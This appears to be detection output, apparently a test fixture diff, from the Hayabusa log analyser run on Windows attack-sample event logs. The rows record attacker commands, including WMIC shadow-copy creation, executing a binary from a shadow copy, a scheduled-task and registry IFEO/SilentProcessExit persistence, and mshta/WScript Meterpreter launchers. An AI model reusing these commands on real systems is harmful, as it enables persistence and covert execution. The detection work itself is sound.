+2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin  List Shadows  :  Path: C:\Windows\System32\vssadmin.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find  ""Shadow Copy Volume""   :  Path: C:\Windows\System32\find.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe  process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe  :  Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: C:\Windows\system32\schtasks.exe  /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\osk.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: IEWIN7\IEUser  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""   :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""  :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}  :  Path: C:\Windows\System32\dllhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup  :  Path: C:\Windows\System32\efsui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe""   :  Path: C:\Windows\System32\VBoxTray.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs""   :  Path: C:\Windows\System32\wscript.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
